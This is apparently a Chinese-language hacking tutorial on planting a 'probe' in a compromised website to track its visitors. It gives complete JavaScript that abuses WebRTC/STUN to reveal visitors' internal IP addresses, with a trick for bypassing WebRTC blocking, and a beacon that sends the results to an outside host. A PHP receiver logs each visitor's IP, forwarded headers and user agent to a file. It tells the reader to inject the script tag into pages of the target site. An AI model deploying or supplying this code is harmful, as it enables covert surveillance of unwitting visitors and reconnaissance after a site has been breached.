前言

在拿到某个站点的权限后,想要知道有谁会访问这个站点的时候,我们可以拿网站的日志,但是有时候我们提权不了,拿不到服务器权限,我们就可以挂一个探针。

探针使用

本次推荐的探针有2个部分,一个是js部分,一个是PHP部分。js是截取信息,PHP是整合信息并写入。单纯的js代码部分做不到获取访问者的内网地址。如果访客没有内网地址,貌似是不会记录的。

把PHP代码保持为T.php,并上传到服务器,可传到自己的服务器,也可传到目标服务器,赋予读写权限,先假设该T.php的URL为:http://52stu.me/js/T.php

把js代码保存为T.js,并上传到服务器,可传到自己的服务器,也可传到目标服务器,先假设该T.js的URL为:http://52stu.me/js/T.js

然后在想要记录的页面引入代码:<script src='http://52stu.me/js/T.js'></script>,比如PHP页面引入代码就是:echo "<script src='http://52stu.me/js/T.js'></script>";

JS代码处理

代码最后一行的src的值要换成PHP代码的URL!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
//Test: Print the IP addresses into the console
// var browser = [];
// var system = [];
// var info = "";

// for (value in client.browser){
// if(client.browser[value] != 0 && client.browser[value] != undefined){
// browser.push(value)
// }

// }

// for (sys in client.system){
// if(client.system[sys] != 0 && client.system[sys] != undefined){
// system.push(sys)
// }
// }
// browser = system[0] + " " + browser[0] + ':' +client.browser[browser[1]];
getIPs(function(ip){new Image().src="http://52stu.me/js/T.php?ip="+escape(ip)});

PHP代码处理

PHP代码是获取内网地址后并把所有信息写入到一个文本里,所以要事先建立一个文件browser.txt,赋予读写权限。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
$iterateIP = $_GET['ip'];
function getIP()
{
if (@$_SERVER["HTTP_X_FORWARDED_FOR"]) {
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else if (@$_SERVER["HTTP_CLIENT_IP"]) {
$ip = $_SERVER["HTTP_CLIENT_IP"];
} else if (@$_SERVER["REMOTE_ADDR"]) {
$ip = $_SERVER["REMOTE_ADDR"];
} else if (@getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
} else if (@getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} else if (@getenv("REMOTE_ADDR")) {
$ip = getenv("REMOTE_ADDR");
} else {

$ip = "Unknown";
}
return $ip." ".$_SERVER['HTTP_USER_AGENT'];
}

$browser_info = date("Y-m-d H:i:s")." ".$iterateIP." ".getIP()."\r\n";
$myfile = fopen("browser.txt", "a+");
fwrite($myfile, $browser_info);
?>

小结

该套探针就是利用Javascript代码来获取数据,然后再把数据传给PHP代码,用PHP代码提取信息并写入。